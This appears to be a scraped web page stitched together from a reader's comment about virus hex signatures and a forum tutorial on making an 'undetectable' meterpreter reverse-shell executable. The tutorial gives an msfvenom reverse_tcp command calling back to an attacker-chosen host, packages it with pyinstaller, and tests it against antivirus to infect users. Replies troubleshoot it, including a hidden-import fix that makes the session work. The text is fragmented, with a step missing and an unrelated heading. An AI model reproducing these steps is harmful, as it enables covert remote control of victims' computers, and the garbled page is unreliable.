JanHi – this is ChittahChattah – I just posted on your RSA hack blog post. I am now posting to ask you your opinion on 2 issues wrt to your above Blog: 1) If I were to detect a virus or malware attached with a packet, I am wondering what sequence of hex I would look for.
I imagine that there must be some very telltale sequence of OpCodes or similar in hex. I took your virus code from GitHub, edited out your comments, and converted into hex. It ended up 6,327 bytes; I then tried to mask it with variety of x86 and ARM OpCodes, but could not discern anything. This is because you did not rely upon Opcodes for your ELF virus. 2) In your opinion, what is the shortest/smallest virus/malware code possible. The code does not need necessarily to manipulate data or replicate – only to insert bad data randomly in a database for example.Thx much – I really enjoy your blog about your youth, and then about Obama logic.
Sorry you have not been posting since Feb 2018 – I hope you get my mail.
Hello everyone, this is my first post so play nice with me.We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes.Hence forth, what I mean by undetectable is that it is undetected by 0 antivirus. Trust me I 've tried and it's possible.But you ask, how is this possible?Let me explain how AV's detect threats in quick and simple language.When you scan an.exe or any other file, it doesn't scan the actual code for bad stuff. It copies the signature and searches it's database if it's a threat or not. Simple.Typically many new executables aren't detected until it's too late.So, how do we change the signature, how we infect the user?Let's do this!Note: All tools used were used under a fresh kali system. Meaning that all tools are already preinstalled. Step 1: Boot Up Kali and Create a Basic ExecutableFirst we need to create a basic script from msfvenom to make the executable.Do the command:msfvenom -p python/meterpreter/reverse- underscore-tcp LHOST = ANYIP LPORT= ANY PORT R anyname.pyHere is mine. As you can see, it dramatically increased the size of the code.Save it now.
How To Program A Virus
Step 3: Convert It into an Executable EXE's.Now, unless you are attacking a Windows based client there is no need for this.Linux is built-in python support. (At least to some extent)Mac has built-in python support.Windows doesn't, and the average consumer doesn't install python on their computer. So what do we do?Make it into an.exe executableRun the command:pyinstaller 'Your.py file here'thats it!Wait for it finish.Once it's finished it will place it in a specific directory.Usually it's in /root/dist/name ofyour file/. Step 4: Testing the Executable Against the AV.Naturally this isn't a good idea because many AV's use virustotal to see new viruses.But it is perfect because a computer can never outsmart a always changing virus.So take your.exe file and scan it!
That will be unpractical, slow and almost impossible.Most executables are encrypted to protect people copying and pasting it.AV's don't have a human brain, meaning that they can't scan code and say 'Wait, the code looks really sketchy. I'm removing it.' But where AV's shine is the removal process. Once the AV finds it, your probably dead meat, I've had scenarios where Malwarebytes caught me but I killed it just in time.Anyway, most users don't need an anti-virus, just don't install sketchy programs. It's not entirely true that AVs don't scan the code. Signature analysis does static code analysis using extracted code patterns from previously analyzed malicious files. If a specific code pattern is found within a file, the AV will start flagging it and may potentially be seen as suspicious.
If enough flags are raised, the file in question will be labelled as malicious depending on the level of sensitivity set in the AV. So in a sense, you could say that an AV knows whether a file is suspicious or not.P.S. Is your file supposed to be a PE file? It's seen as an ELF64 on the Virus Total scan. Maybe this worked when the tutorial came out, but now it definitely doesn't.
It might be a good idea to to tell everyone that in order to make a Windows executable, pyinstaller needs to run on Windows. By running pyinstaller on Linux, it makes a linux executable, which could be the reason a lot of people are getting an error that the program can't run on your pc.
And it's the reason that it's not detected on VirusTotal - most AV's only support Windows executables.Another issue is that you don't actually test the payload. I found that when executing this and it connects, you will get an error saying something like 'This script cannot run' (I forgot what the exact error was). I ran it in debug mode, and apparently it was failing a bit of code in the stage (All the code can be seen ). If you look at line 19, you see the code is import ctypes. This was the error I was getting said it couldn't import ctypes, because it threw a NameError. The solution for this is adding a bit of code to the pyinstaller command: pyinstaller -hiddenimport ctypes yourscript.py. Now the session is created succesfully, but there are some commands missing, and others like shell don't work.
This is not a very elegant solution.